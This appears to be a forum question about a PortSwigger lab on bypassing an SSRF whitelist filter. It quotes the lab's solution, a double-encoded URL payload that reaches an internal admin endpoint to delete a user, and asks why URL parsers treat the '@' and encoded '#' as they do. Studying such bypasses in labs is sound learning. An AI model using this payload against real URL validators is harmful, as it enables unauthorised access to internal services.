The URL with the exercise is: https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter
The solution is:
http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos
A little simplified (no port specified):
http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos
We can concentrate simply on:
http://localhost%2523@stock.weliketoshop.net
Why is the credential component (everything before the @
) processed as if everything after the @
is part of a URL fragment? Before double encoding the #
character, the URL looks like this:
http://localhost#@stock.weliketoshop.net
Why is the @
even necessary, even after we double encode the #
? Why does http://localhost%2523stock.weliketoshop.net
(not no '@') not work? Does the url fragment statement take priority over the credential statement? Why is the @
ignored in favor of the #
?